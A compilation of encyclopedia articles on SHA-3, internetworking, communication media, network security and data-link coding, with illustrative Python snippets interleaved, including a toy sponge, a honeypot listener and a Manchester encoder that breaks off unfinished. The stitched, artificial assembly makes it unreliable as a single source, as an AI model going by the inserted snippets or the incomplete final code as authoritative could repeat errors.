The state can be considered to be a 5 × 5 × w array of bits. Let a[i][j][k] be bit (5i + j) × w + k of the input, using a little-endian bit numbering convention and row-major indexing; i.e., i selects the row, j the column, and k the bit. Index arithmetic is performed modulo 5 for the first two dimensions and modulo w for the third. The basic block permutation function consists of 12 + 2ℓ rounds of five steps, known as θ (theta), ρ (rho), π (pi), χ (chi), and ι (iota).

The speed of SHA-3 hashing of long messages is dominated by the computation of f = Keccak-f[1600] and XORing S with the extended P_i, an operation on b = 1600 bits. However, since the last c bits of the extended P_i are 0 anyway, and XOR with 0 is a NOP, it is sufficient to perform XOR operations only for r bits (r = 1600 − 2 × 224 = 1152 bits for SHA3-224, 1088 bits for SHA3-256, 832 bits for SHA3-384 and 576 bits for SHA3-512). The lower r is (and, conversely, the higher c = b − r = 1600 − r), the less efficient but more secure the hashing becomes, since fewer bits of the message can be XORed into the state (a quick operation) before each application of the computationally expensive f.

The authors report the following speeds for software implementations of Keccak-f[1600] plus XORing 1024 bits,[1] which roughly corresponds to SHA3-256.

For the exact SHA3-256 on x86-64, Bernstein measures 11.7–12.25 cpb depending on the CPU.[40]: 7 SHA-3 has been criticized for being slow on instruction set architectures (CPUs) which do not have instructions meant specially for computing Keccak functions faster: SHA2-512 is more than twice as fast as SHA3-512, and SHA-1 is more than three times as fast on an Intel Skylake processor clocked at 3.2 GHz.[41] The authors have reacted to this criticism by suggesting the use of SHAKE128 and SHAKE256 instead of SHA3-256 and SHA3-512, at the expense of cutting the preimage resistance in half (but while keeping the collision resistance). With this, performance is on par with SHA2-256 and SHA2-512. However, in hardware implementations, SHA-3 is notably faster than all other finalists,[42] and also faster than SHA-2 and SHA-1.[41]

As of 2018, ARM's ARMv8[43] architecture includes special instructions which enable Keccak algorithms to execute faster, and IBM's z/Architecture[44] includes a complete implementation of SHA-3 and SHAKE in a single instruction.
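The absorb/squeeze mechanics described above are easy to see in miniature. The sketch below is a generic byte-level sponge with an illustrative 10*1-style padding; the "permutation" is a deliberate stand-in (SHA-256 is not a permutation, and real SHA-3 uses Keccak-f[1600] with bit-level, LSB-first padding plus a domain suffix), so only the structure is meaningful:

import hashlib

B, R = 32, 16   # toy parameters: 32-byte state, 16-byte rate, 16-byte capacity

def toy_perm(state: bytes) -> bytes:
    # Stand-in for the state transformation f.
    return hashlib.sha256(state).digest()

def pad_multirate(msg: bytes, rate: int) -> bytes:
    # Byte-level sketch of the 10*1 pattern: first and last pad bits set.
    gap = rate - len(msg) % rate
    if gap == 1:
        return msg + b"\x81"
    return msg + b"\x80" + b"\x00" * (gap - 2) + b"\x01"

def sponge(msg: bytes, outlen: int) -> bytes:
    state = bytes(B)
    padded = pad_multirate(msg, R)
    # Absorb: XOR each rate-sized block into the first R bytes, then apply f.
    for i in range(0, len(padded), R):
        block = padded[i:i + R] + bytes(B - R)
        state = toy_perm(bytes(a ^ b for a, b in zip(state, block)))
    # Squeeze: emit R bytes at a time, applying f between output blocks.
    out = b""
    while len(out) < outlen:
        out += state[:R]
        state = toy_perm(state)
    return out[:outlen]

print(sponge(b"hello sponge", 32).hex())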
There have also been extension proposals for RISC-V to add Keccak-specific instructions.[45]

The NIST standard defines the following instances, for message M and output length d:[6]: 20, 23

SHA3-224(M) = Keccak[448](M ∥ 01, 224)
SHA3-256(M) = Keccak[512](M ∥ 01, 256)
SHA3-384(M) = Keccak[768](M ∥ 01, 384)
SHA3-512(M) = Keccak[1024](M ∥ 01, 512)
SHAKE128(M, d) = Keccak[256](M ∥ 1111, d)
SHAKE256(M, d) = Keccak[512](M ∥ 1111, d)

with the definition Keccak[c](N, d) = sponge[Keccak-f[1600], pad10*1, 1600 − c](N, d).

SHA-3 instances are drop-in replacements for SHA-2, intended to have identical security properties. SHAKE will generate as many bits from its sponge as requested, thus being an extendable-output function (XOF). For example, SHAKE128(M, 256) can be used as a hash function with a 256-bit output and 128-bit security strength. Arbitrarily long outputs can be used as a pseudo-random number generator. Alternately, SHAKE256(M, 128) can be used as a hash function with a 128-bit output length and 128-bit resistance.[6]

All instances append some bits to the message, the rightmost of which represent the domain separation suffix. The purpose of this is to ensure that it is not possible to construct messages that produce the same hash output for different applications of the Keccak hash function. The following domain separation suffixes exist:[6][46]

In December 2016, NIST published a new document, NIST SP 800-185,[47] describing additional SHA-3-derived functions, parameterized as follows:

• X is the main input bit string. It may be of any length, including zero.
• L is an integer representing the requested output length in bits.
• N is a function-name bit string, used by NIST to define functions based on cSHAKE. When no function other than cSHAKE is desired, N is set to the empty string.
• S is a customization bit string. The user selects this string to define a variant of the function. When no customization is desired, S is set to the empty string.
• K is a key bit string of any length, including zero.
• B is the block size in bytes for parallel hashing. It may be any integer such that 0 < B < 2^2040.

In 2016 the same team that made the SHA-3 functions and the Keccak algorithm introduced faster reduced-round alternatives (reduced to 12 and 14 rounds, from the 24 in SHA-3) which can exploit the availability of parallel execution through tree hashing: KangarooTwelve and MarsupilamiFourteen.[49]

These functions differ from ParallelHash, the FIPS-standardized Keccak-based parallelizable hash function, with regard to the parallelism, in that they are faster than ParallelHash for small message sizes.

The reduced number of rounds is justified by the huge cryptanalytic effort focused on Keccak, which did not produce practical attacks on anything close to twelve-round Keccak. These higher-speed algorithms are not part of SHA-3 (as they are a later development), and thus are not FIPS compliant; but because they use the same Keccak permutation, they are secure for as long as there are no attacks on SHA-3 reduced to 12 rounds.[49]

KangarooTwelve is a higher-performance reduced-round (from 24 to 12 rounds) version of Keccak which claims to have 128 bits of security[50] while having performance as high as 0.55 cycles per byte on a Skylake CPU.[51] This algorithm is an IETF RFC draft.[52]

MarsupilamiFourteen, a slight variation on KangarooTwelve, uses 14 rounds of the Keccak permutation and claims 256 bits of security. Note that 256-bit security is not more useful in practice than 128-bit security, but may be required by some standards.[50] 128 bits are already sufficient to defeat brute-force attacks on current hardware, so having 256-bit security does not add practical value, unless the user is worried about significant advancements in the speed of classical computers. For resistance against quantum computers, see below.
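Python's standard library exposes the FIPS 202 instances defined above, which makes the fixed-length versus extendable-output distinction easy to demonstrate:

import hashlib

msg = b"The quick brown fox jumps over the lazy dog"
print(hashlib.sha3_256(msg).hexdigest())      # fixed 256-bit digest
print(hashlib.sha3_512(msg).hexdigest())      # fixed 512-bit digest
# SHAKE is an extendable-output function: request any number of bytes
print(hashlib.shake_128(msg).hexdigest(32))   # 256 bits from SHAKE128
print(hashlib.shake_256(msg).hexdigest(16))   # 128 bits from SHAKE256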
KangarooTwelve and MarsupilamiFourteen are extendable-output functions, similar to SHAKE; therefore they generate closely related output for a common message with different output lengths (the longer output is an extension of the shorter output). Such a property is not exhibited by hash functions such as SHA-3 or ParallelHash (except for the XOF variants).[6]

In 2016, the Keccak team released a different construction called the Farfalle construction, and Kravatte, an instance of Farfalle using the Keccak-p permutation,[53] as well as two authenticated encryption algorithms, Kravatte-SANE and Kravatte-SANSE.[54]

RawSHAKE is the basis for the Sakura coding for tree hashing, which has not been standardized yet. Sakura uses a suffix of 1111 for single nodes, equivalent to SHAKE, and other generated suffixes depending on the shape of the tree.[46]: 16

There is a general result (Grover's algorithm) that quantum computers can perform a structured preimage attack in √(2^d) = 2^(d/2) evaluations, while a classical brute-force attack needs 2^d. A structured preimage attack implies a second preimage attack[29] and thus a collision attack. A quantum computer can also perform a birthday attack, thus breaking collision resistance, in ∛(2^d) = 2^(d/3) evaluations[55] (although that is disputed).[56] Noting that the maximum strength can be c/2, this gives the following upper[57] bounds on the quantum security of SHA-3:

It has been shown that the Merkle–Damgård construction, as used by SHA-2, is collapsing and, by consequence, quantum collision-resistant,[58] but for the sponge construction used by SHA-3, the authors provide proofs only for the case when the block function f is not efficiently invertible; Keccak-f[1600], however, is efficiently invertible, and so their proof does not apply.[59][original research]

The following hash values are from NIST.gov:[60]

Changing a single bit causes each bit in the output to change with 50% probability, demonstrating an avalanche effect.

In the table below, internal state means the number of bits that are carried over to the next block.

Optimized implementations of SHA3-256 using AVX-512VL (e.g., from OpenSSL, running on Skylake-X CPUs) achieve about 6.4 cycles per byte for large messages,[66] and about 7.8 cycles per byte when using AVX2 on Skylake CPUs.[67] Performance on other x86, Power and ARM CPUs, depending on the instructions used and the exact CPU model, varies from about 8 to 15 cycles per byte,[68][69][70] with some older x86 CPUs up to 25–40 cycles per byte.[71]

Below is a list of cryptography libraries that support SHA-3:

Apple A13 ARMv8 six-core SoC CPU cores have support[72] for accelerating SHA-3 (and SHA-512) using specialized instructions (EOR3, RAX1, XAR, BCAX) from the ARMv8.2-SHA crypto extension set.[73]

Some software libraries use vectorization facilities of CPUs to accelerate usage of SHA-3. For example, Crypto++ can use SSE2 on x86 for accelerating SHA-3,[74] and OpenSSL can use MMX, AVX-512 or AVX-512VL on many x86 systems too.[75] Also, POWER8 CPUs implement a 2x64-bit vector rotate, defined in PowerISA 2.07, which can accelerate SHA-3 implementations.[76] Most implementations for ARM do not use Neon vector instructions, as scalar code is faster.
ARM implementations can however be accelerated using SVE and SVE2 vector instructions; these are available in the Fujitsu A64FX CPU, for instance.[77]

The IBM z/Architecture has supported SHA-3 since 2017 as part of the Message-Security-Assist Extension 6.[78] The processors support a complete implementation of the entire SHA-3 and SHAKE algorithms via the KIMD and KLMD instructions, using a hardware-assist engine built into each core.

Ethereum uses the Keccak-256 hash function (as per version 3 of the winning entry to the SHA-3 contest by Bertoni et al., which is different from the final SHA-3 specification).[79]
https://en.wikipedia.org/wiki/SHA-3#Additional_instances
Internetworking is the practice of interconnecting multiple computer networks.[1]: 169 Typically, this enables any pair of hosts in the connected networks to exchange messages irrespective of their hardware-level networking technology. The resulting system of interconnected networks is called an internetwork, or simply an internet.

The most notable example of internetworking is the Internet, a network of networks based on many underlying hardware technologies. The Internet is defined by a unified global addressing system, packet format, and routing methods provided by the Internet Protocol.[2]: 103

The term internetworking is a combination of the components inter (between) and networking. An earlier term for an internetwork is catenet,[3] a short form of (con)catenating networks.

The first international heterogeneous resource sharing network was developed by the computer science department at University College London (UCL), which interconnected the ARPANET with early British academic networks beginning in 1973.[4][5][6] In the ARPANET, the network elements used to connect individual networks were called gateways, but the term has been deprecated in this context because of possible confusion with functionally different devices.

By 1973–74, researchers in France, the United States, and the United Kingdom had worked out an approach to internetworking in which the differences between network protocols were hidden by using a common internetwork protocol and, instead of the network being responsible for reliability, as in the ARPANET, the hosts became responsible, as demonstrated in the CYCLADES network.[7][8][9] Researchers at Xerox PARC outlined the idea of Ethernet and the PARC Universal Packet (PUP) for internetworking.[10][11] Research at the National Physical Laboratory in the United Kingdom confirmed that establishing a common host protocol would be more reliable and efficient.[12]

The ARPANET connection to UCL later evolved into SATNET. In 1977, ARPA demonstrated a three-way internetworking experiment, which linked a mobile vehicle in PRNET with nodes in the ARPANET and, via SATNET, with nodes at UCL. The X.25 protocol, on which public data networks were based in the 1970s and 1980s, was supplemented by the X.75 protocol, which enabled internetworking.

Today the interconnecting gateways are called routers. The definition of an internetwork today includes the connection of other types of computer networks, such as personal area networks.

Catenet, a short form of (con)catenating networks, is obsolete terminology for a system of packet-switched communication networks interconnected via gateways.[3] The term was coined by Louis Pouzin, who designed the CYCLADES network, in an October 1973 note circulated to the International Network Working Group,[13][14] which was published in a 1974 paper, "A Proposal for Interconnecting Packet Switching Networks".[15] Pouzin was a pioneer of internetworking at a time when network meant what is now called a local area network. Catenet was the concept of linking these networks into a network of networks, with specifications for compatibility of addressing and routing.
The term was used in technical writing in the late 1970s and early 1980s,[16] including in RFCs and IENs.[17] Catenet was gradually displaced by the short form of the term internetwork, internet (lower-case i), when the Internet Protocol spread more widely from the mid-1980s, and the use of the term internet took on a broader sense and became well known in the 1990s.[18][19][20][21][22][23][24][25]

Internetworking, a combination of the components inter (between) and networking, started as a way to connect disparate types of networking technology, but it became widespread through the developing need to connect two or more local area networks via some sort of wide area network.

To build an internetwork, the following are needed:[2]: 103 a standardized scheme to address packets to any host on any participating network; a standardized protocol defining the format and handling of transmitted packets; and components interconnecting the participating networks by routing packets to their destinations based on standardized addresses.

Another type of interconnection of networks often occurs within enterprises at the link layer of the networking model, i.e. at the hardware-centric layer below the level of the TCP/IP logical interfaces. Such interconnection is accomplished with network bridges and network switches. This is sometimes incorrectly termed internetworking, but the resulting system is simply a larger, single subnetwork, and no internetworking protocol, such as the Internet Protocol, is required to traverse these devices. However, a single computer network may be converted into an internetwork by dividing the network into segments, logically dividing the segment traffic with routers, and having an internetworking software layer that applications employ.

The Internet Protocol is designed to provide an unreliable (not guaranteed) packet service across the network. The architecture avoids intermediate network elements maintaining any state of the network. Instead, this function is assigned to the endpoints of each communication session. To transfer data reliably, applications must utilize an appropriate transport layer protocol, such as the Transmission Control Protocol (TCP), which provides a reliable stream. Some applications use a simpler, connectionless transport protocol, the User Datagram Protocol (UDP), for tasks which do not require reliable delivery of data or that require real-time service, such as video streaming[26] or voice chat (a minimal socket-level sketch of this distinction follows below).

Two architectural models are commonly used to describe the protocols and methods used in internetworking. The Open System Interconnection (OSI) reference model was developed under the auspices of the International Organization for Standardization (ISO) and provides a rigorous description for layering protocol functions from the underlying hardware to the software interface concepts in user applications. Internetworking is implemented in the Network Layer (Layer 3) of the model.

The Internet Protocol Suite, also known as the TCP/IP model, was not designed to conform to the OSI model and does not refer to it in any of the normative specifications in Requests for Comments and Internet standards. Despite a similar appearance as a layered model, it has a much less rigorous, loosely defined architecture that concerns itself only with the aspects of the style of networking in its own historical provenance. It assumes the availability of any suitable hardware infrastructure, without discussing hardware-specific low-level interfaces, and assumes that a host has access to this local network to which it is connected via a link layer interface.
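The reliable-stream versus best-effort-datagram distinction above is visible directly in the sockets API. A minimal sketch (the loopback address and port are arbitrary examples):

import socket

# UDP: connectionless datagram service; the protocol gives no delivery,
# ordering, or duplication guarantees.
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(b"hello", ("127.0.0.1", 9999))     # fire and forget
udp.close()

# TCP: endpoint connection state plus retransmission presents the
# application with a reliable byte stream.
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    tcp.connect(("127.0.0.1", 9999))          # handshake; fails if nothing listens
    tcp.sendall(b"hello")
except ConnectionRefusedError:
    print("no listener: TCP reports the failure; the UDP send above could not")
finally:
    tcp.close()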
For a period in the late 1980s and early 1990s, the network engineering community was polarized over the implementation of competing protocol suites, a conflict commonly known as the Protocol Wars. It was unclear which of the OSI model and the Internet protocol suite would result in the best and most robust computer networks.[27][28][29]
https://en.wikipedia.org/wiki/Internetworking
Means of communication are used by people to communicate and exchange information with each other as an information sender and a receiver. Many different materials are used in communication. Maps, for example, save tedious explanations of how to get to a destination. A means of communication is therefore a means to an end to make communication between people easier, more understandable and, above all, clearer. In everyday language, the term means of communication is often equated with the medium. However, the term "medium" is used in media studies to refer to a large number of concepts, some of which do not correspond to everyday usage.[1][2]

Means of communication are used for communication between sender and recipient and thus for the transmission of information. Elements of communication include a communication-triggering event, sender and recipient, a means of communication, a path of communication and contents of communication.[3] The path of communication is the path that a message travels between sender and recipient; in hierarchies, the vertical line of communication is identical to command hierarchies.[4] Paths of communication can be physical (e.g. the road as a transportation route) or non-physical (e.g. networks like a computer network). Contents of communication can be, for example, photographs, data, graphics, language, or texts.

Means of communication in the narrower sense refer to technical devices that transmit information.[5] They are the manifestations of contents of communication that can be perceived through the senses; they replace the communication that originally ran from person to person and make it reproducible.[6]

The role of regulatory authorities (which license broadcasters, content providers, and platforms) and the resistance to political and commercial interference in the autonomy of the media sector are both considered significant components of media independence. In order to ensure media independence, regulatory authorities should be placed outside of governments' directives. This can be measured through legislation, agency statutes and rules.[7]

In the United States, the Radio Act of 1927 established that the radio frequency spectrum was public property. This prohibited private organizations from owning any portion of the spectrum.[8] A broadcast license is typically given to broadcasters by communications regulators, allowing them to broadcast on a certain frequency and typically in a specific geographical location. Licensing is done by regulators in order to manage a broadcasting medium and as a method to prevent the concentration of media ownership.[9]

Licensing has been criticized for an alleged lack of transparency. Regulatory authorities in certain countries have been accused of exhibiting political bias in favor of the government or ruling party, which has resulted in some prospective broadcasters being denied licenses or being threatened with license withdrawal. As a consequence, there has been a decrease in diversity of content and views in certain countries due to actions taken against broadcasters by states via their licensing authorities.
This can have an impact on competition and may lead to an excessive concentration of power with potential influence on public opinion.[10] Examples include the failure to renew or retain licenses for editorially critical media, reducing the regulator's competences and mandates for action, and a lack of due process in the adoption of regulatory decisions.[11]

Governments worldwide have sought to extend regulation to internet companies, whether connectivity providers or application service providers, and whether domestically or foreign-based. The impact on journalistic content can be severe, as internet companies can err too much on the side of caution and take down news reports, including algorithmically, while offering inadequate opportunities for redress to the affected news producers.[7]

In Western Europe, self-regulation provides an alternative to state regulatory authorities. In such contexts, newspapers have historically been free of licensing and regulation, and there has been repeated pressure for them to self-regulate or at least to have in-house ombudsmen. However, it has often been difficult to establish meaningful self-regulatory entities. In many cases, self-regulation exists in the shadow of state regulation and is conscious of the possibility of state intervention. In many countries in Central and Eastern Europe, self-regulatory structures seem to be lacking or have not historically been perceived as efficient and effective.[12]

The rise of satellite channels that deliver directly to viewers, or through cable or online systems, renders much larger the sphere of unregulated programming. There are, however, varying efforts to regulate the access of programmers to satellite transponders in parts of Western Europe, North America, the Arab region and Asia and the Pacific. The Arab Satellite Broadcasting Charter was an example of efforts to bring formal standards and some regulatory authority to bear on what is transmitted, but it appears not to have been implemented.[13]

Self-regulation is expressed as a preferential system by journalists, and also as a form of support for media freedom and development organizations by intergovernmental organizations such as UNESCO and by non-governmental organizations. There has been a continued trend of establishing self-regulatory bodies, such as press councils, in conflict and post-conflict situations.[14]

Major internet companies have responded to pressure by governments and the public by elaborating self-regulatory and complaints systems at the individual company level, using principles they have developed under the framework of the Global Network Initiative. The Global Network Initiative has grown to include several large telecom companies alongside internet companies such as Google, Facebook and others, as well as civil society organizations and academics.[15]

The European Commission's 2013 publication, ICT Technology Sector Guide on Implementing the United Nations Guiding Principles on Business and Human Rights, affects the presence of independent journalism by defining the limits of what should or should not be carried and prioritized in the most popular digital spaces.[16]

Public pressure on technology giants has motivated the development of new strategies aimed not only at identifying 'fake news', but also at eliminating some of the structural causes of its emergence and proliferation. Facebook has created new buttons for users to report content they believe is false, following previous strategies aimed at countering hate speech and harassment online.
These changes reflect broader transformations occurring among tech giants to increase their transparency. As indicated by the Ranking Digital Rights Corporate Accountability Index, most large internet companies have reportedly become relatively more forthcoming in terms of their policies about transparency in regard to third-party requests to remove or access content, especially in the case of requests from governments.[17][18] At the same time, however, the study signaled a number of companies that have become more opaque when it comes to disclosing how they enforce their own terms of service in restricting certain types of content and accounts.[18] State governments can also use "fake news" in order to spread propaganda.[19]

In addition to responding to pressure for more clearly defined self-regulatory mechanisms, and galvanized by the debates over so-called 'fake news', internet companies such as Facebook have launched campaigns to educate users about how to more easily distinguish between 'fake news' and real news sources. Ahead of the United Kingdom national election in 2017, for example, Facebook published a series of advertisements in newspapers with 'Tips for Spotting False News', which suggested ten things that might signal whether a story is genuine or not.[20] There have also been broader initiatives bringing together a variety of donors and actors to promote fact-checking and news literacy, such as the News Integrity Initiative at the City University of New York's School of Journalism. This 14 million USD investment by groups including the Ford Foundation and Facebook was launched in 2017, so its full impact remains to be seen. It will, however, complement the offerings of other networks, such as the International Fact-Checking Network launched by the Poynter Institute in 2015, which seeks to outline the parameters of the field.[21]

Instagram has also created a way to potentially expose "fake news" posted on the site. On closer inspection, the site appeared to be more than a place for political memes: a weaponized platform rather than the creative space it used to be.[22] Since then, Instagram has started to put warning labels on certain stories or posts if third-party fact-checkers believe that false information is being spread.[23] Instagram works with these fact-checkers to ensure that no false information spreads around the site.[24] Instagram started this work in 2019, following Facebook, which began fact-checking in 2016.[24]

Developments in telecommunications have given media the ability to conduct long-distance communication via analog and digital channels. Modern communication media enable long-distance exchanges between larger numbers of people (many-to-many communication via email, Internet forums, and telecommunications ports), while traditional broadcast media and mass media favor one-to-many communication (television, cinema, radio, newspapers, magazines, and social media).[25][26]

Electronic media, and specifically social media, have become one of the top forms of media that people use in the twenty-first century. The percentage of people that use social media and social networking outlets rose dramatically from 5% in 2005 to 79% in 2019. Instagram, Twitter, Pinterest, TikTok, and Facebook are the most commonly used social media platforms. The average time an individual spends on social media is 2.5 hours a day. This exponential increase in social media use has additionally changed the way people communicate with others as well as receive information.
About 53% use social media to read/watch the news.[27]Many people use the information specifically from social media influencers to understand more about a topic, business, or organization.[28]Social media has now been made part of everyday news production for journalists around the world.[29]Not only does social media provide more connection between readers and journalists, but it also cultivates participation and community amongst technical communicators and their audiences, clients, and stakeholders.[30] The gaming community has grown exponentially, and about 65% of players have taken to playing with others, whether online or in-person.[31]Players online communicate by microphone, either through the game itself or through a third-party application such asDiscord. Improvements in connectivity and software have allowed online players to keep in touch and game instantaneously, almost regardless of location. Online gaming platforms have been noted to support diverse social gaming communities, allowing players to feel a sense of belonging through the screen.[32] Gaming is an activity shared regardless of age, allowing a diverse group of players to connect and enjoy their favorite games together. This helps create or maintain relationships, whether friendships, family ties, or a relationship with a significant other.[31] As with most interactive media content, games have ratings to assist in choosing appropriate games for younger audiences. This is done throughESRB ratings: E for Everyone, E10+ for Everyone 10+, T for Teen, and M for Mature 17+. Whenever a new game is released, it is reviewed by associations to determine a suitable rating so younger audiences do not consume harmful or inappropriate content.[31]These ratings help limit the risks and effects of gaming on younger audiences, because exposure to media is believed to influence children's attitudes, beliefs, and behaviors.[33] The usage and consumption of gaming has increased tremendously within the last decade, with an estimated 2.3 billion people from around the world playing digital and online video games.[34]The global market for gaming was expected to grow 6.2% towards 2020. Latin America saw a 20.1% increase, Asia-Pacific 9.2%, North America 4.0%, and Europe 11.7%.[35] Studies show that digital and online gaming can be used as a communication method to aid in scientific research and create interaction. The narrative, layout, and gaming features all share a relationship that can deliver meaning and value, making games an innovative communication tool.[36]Research-focused games showed a connection to greater use of dialogue within the science community, as players had the opportunity to address issues within a game together with scientists. This helped advance the understanding of how games and players can help scientific research via communication through games.[37] A vBook is aneBookthat isdigital first mediawithembeddedvideo,images,graphs,tables,text, and other useful media.[38] An E-book combines reading and listening media interaction. It is compact and can store a large amount of data, which has made it very popular in classrooms.[39] Up until the 19th century the term was primarily applied totrafficandcouriersand tomeans of transportandtransportation routes, such as railways, roads and canals,[40]but was also used to includepost ridersandstagecoaches. 
In 1861, the national economistAlbert Schäffledefined a means of communication as an aid to the circulation of goods and financial services, which included, among other things, newspapers,telegraphy, mail, courier services,remittance advice, invoices, andbills of lading.[41] In the period that followed, the "technical means of communication" increasingly came to the foreground, so that as early as 1895 the German newspaper "Deutsches Wochenblatt" reported that these technical means of communication had been improved to such an extent that "everyone all over the world has become our neighbor".[42] Not until the 20th century did the termmediumalso become a synonym for these technical means of communication. In the 1920s the termmass mediastarted to become more popular. A distinction can be made betweenoral,written,screen-oriented transfer of informationanddocument transport,[43]a classification that also covers means of communication no longer used today. Furthermore, a distinction can be made between: Means of communication in the narrower sense are those of technical communication. In companies (businesses, agencies, institutions) typical means of communication includedocuments, such as analyses,business cases,due diligencereviews,financial analyses, forms,business models,feasibility studies, scientific publications, and contracts. The means of natural communication, or the "primary media" (seeMedia studies), include: Means of communication are often differentiated inmodels of communication: Media as means of communication will in future be distinguished: Mass media refers to reaching many recipients from one sender – or a few – simultaneously or nearly simultaneously. Due to their wide dissemination, mass media are suitable for providing the majority of the population with the same information.
https://en.wikipedia.org/wiki/Media_(communication)
Network securityis an umbrella term to describesecurity controls,policies, processes and practices adopted to prevent, detect and monitorunauthorizedaccess,misuse, modification, or denial of acomputer networkand network-accessible resources.[1]Network security involves the authorization of access to data in a network, which is controlled by thenetwork administrator. Users choose or are assigned an ID and password or other authenticating information that allows them access to information and programs within their authority. Network security covers a variety of computer networks, both public and private, that are used in everyday jobs: conducting transactions and communications among businesses,government agenciesand individuals. Networks can be private, such as within a company, while others might be open to public access. Network security is involved in organizations, enterprises, and other types of institutions. It does as its title explains: it secures the network, as well as protecting and overseeing the operations being carried out on it. The most common and simple way of protecting a network resource is by assigning it a unique name and a corresponding password. Network security starts withauthentication, commonly with a username and apassword. Since this requires just one detail authenticating the user name—i.e., the password—this is sometimes termed one-factor authentication. Withtwo-factor authentication, something the user 'has' is also used (e.g., asecurity tokenor 'dongle', anATM card, or amobile phone); and with three-factor authentication, something the user 'is' is also used (e.g., afingerprintorretinal scan). Once authenticated, afirewallenforces access policies such as what services are allowed to be accessed by the network users.[2][3]Though effective to prevent unauthorized access, this component may fail to check potentially harmful content such ascomputer wormsorTrojansbeing transmitted over the network.Anti-virus softwareor anintrusion prevention system(IPS)[4]help detect and inhibit the action of suchmalware. Ananomaly-based intrusion detection systemmay also monitor networktraffic(much as tools such as Wireshark do), and that traffic may be logged for audit purposes and for later high-level analysis. Newer systems combining unsupervisedmachine learningwith full network traffic analysis can detect active network attackers from malicious insiders or targeted external attackers that have compromised a user machine or account.[5] Communication between two hosts using a network may be encrypted to maintain security and privacy. Honeypots, essentiallydecoynetwork-accessible resources, may be deployed in a network assurveillanceand early-warning tools, as the honeypots are not normally accessed for legitimate purposes. Honeypots are placed at a point in the network where they appear vulnerable and undefended, but they are actually isolated and monitored.[6]Techniques used by the attackers that attempt to compromise these decoy resources are studied during and after an attack to keep an eye on newexploitationtechniques. Such analysis may be used to further tighten security of the actual network being protected by the honeypot. A honeypot can also direct an attacker's attention away from legitimate servers. A honeypot encourages attackers to spend their time and energy on the decoy server while distracting their attention from the data on the real server. 
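To make the honeypot idea concrete, the following is a minimal sketch (not drawn from any particular product) of a decoy listener: it accepts connections on an otherwise unused port, records who connected and what they first sent, and serves nothing real. The port number and log file name are arbitrary choices for illustration.

```python
import datetime
import socket

def run_decoy(host: str = "0.0.0.0", port: int = 2222, logfile: str = "decoy.log") -> None:
    """Accept connections on a decoy port and log each caller's first bytes."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
            with conn:
                conn.settimeout(5.0)
                try:
                    first_bytes = conn.recv(1024)  # whatever the caller sends first
                except socket.timeout:
                    first_bytes = b""
            with open(logfile, "a") as log:
                log.write(f"{datetime.datetime.now().isoformat()} "
                          f"{addr[0]}:{addr[1]} {first_bytes!r}\n")

# run_decoy()  # blocks forever; a real deployment would isolate and monitor this host
```

The essential property is the one described above: since no legitimate service lives on the decoy port, every connection to it is by definition suspicious and worth studying.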
Similar to a honeypot, ahoneynetis a network set up with intentional vulnerabilities. Its purpose is also to invite attacks so that the attacker's methods can be studied and that information can be used to increase network security. A honeynet typically contains one or more honeypots.[7] Previous research on network security was mostly about using tools to secure transactions and information flow, and how well users knew about and used these tools. However, more recently, the discussion has expanded to considerinformation securityin the broader context of thedigital economyand society. This indicates that it is not just about individual users and tools; it is also about the larger culture of information security in our digital world.[8] Security management for networks is different for all kinds of situations. A home or small office may only require basic security while large businesses may require high-maintenance and advanced software and hardware to prevent malicious attacks fromhackingandspamming. In order to minimize susceptibility to malicious attacks from external threats to the network, corporations often employ tools which carry out network security verifications. Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes.[9] Networks are subject toattacksfrom malicious sources. Attacks fall into two categories: "passive", when a network intruder intercepts data traveling through the network, and "active", in which an intruder initiates commands to disrupt the network's normal operation or to conduct reconnaissance and lateral movements to find and gain access to assets available via the network.[10] Types of attacks include:[11]
https://en.wikipedia.org/wiki/Network_security
Intelecommunications,node-to-node data transfer[1]is the movement of data from onenodeof anetworkto the next. In theOSI modelit is handled by the lowest two layers, thedata link layerand thephysical layer. In most communication systems, the transmitting point appliessource coding,[2]followed bychannel coding, and lastly,line coding. This produces thebasebandsignal. The presence of filters may performpulse shaping. Some systems then usemodulationto multiplex many baseband signals into abroadbandsignal. The receiver undoes these transformations in reverse order: demodulation, trellis decoding, error detection and correction, decompression. Some communication systems omit one or more of these steps, or use techniques that combine several of these steps together. For example, aMorse codetransmitter combines source coding, channel coding, and line coding into one step, typically followed by anamplitude modulationstep.Barcodes, on the other hand, add a checksum digit during channel coding, then translate each digit into a barcode symbol during line coding, omitting modulation. Source coding is the elimination of redundancy to make efficient use of storage space and/or transmission channels. Examples ofsource codingare: Indigitaltelecommunications,channel coding[3]is a pre-transmission mapping applied to adigital signalor data file, usually designed to make error-correction (or at leasterror detection) possible. Error correction is implemented by using moredigits(bitsin the case of a binary channel) than the number strictly necessary for the samples and having the receiver compute the most likely valid message that could have resulted in the received one. Types ofchannel codinginclude: Line codingconsists of representing thedigital signalto be transported by an amplitude- and time-discrete signal that is optimally tuned for the specific properties of the physical channel (and of the receiving equipment). Thewaveformpattern of voltage or current used to represent the 1s and 0s of a digital signal on a transmission link is calledline encoding. After line coding, the signal can directly be put on a transmission line, in the form of variations of the current. The common types of line encoding areunipolar,polar,bipolarandManchester encoding. Line coding should make it possible for the receiver to synchronise itself to thephaseof the received signal. It is also preferred for the line code to have a structure that will enable error detection. Examples ofline codinginclude (see the main articleline code): Modulationis the process of varying acarrier signal, typically asine wave, to use that signal to conveyinformation. One of the three key characteristics of a signal is usually modulated: itsphase,frequencyoramplitude. Indigitalmodulation, the changes in the signal are chosen from a fixed list (themodulation alphabet), each entry of which conveys a different possible piece of information (a symbol). Inanaloguemodulation, the change is applied continuously in response to the data signal. Modulation is generally performed to overcome signal transmission issues, for example by shifting the signal to frequencies suited to the transmission channel. Carrier signals are usually high frequency electromagnetic waves. Examples ofmodulationinclude:
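As an illustration of line coding, here is a small sketch of Manchester encoding. The polarity convention is an assumption (the one usually attributed to IEEE 802.3: a 0 bit becomes a high-to-low pair, a 1 bit a low-to-high pair); the G. E. Thomas convention is the reverse.

```python
def manchester_encode(bits: list[int]) -> list[int]:
    """Encode data bits as half-bit levels; every bit yields a mid-bit transition."""
    levels = []
    for b in bits:
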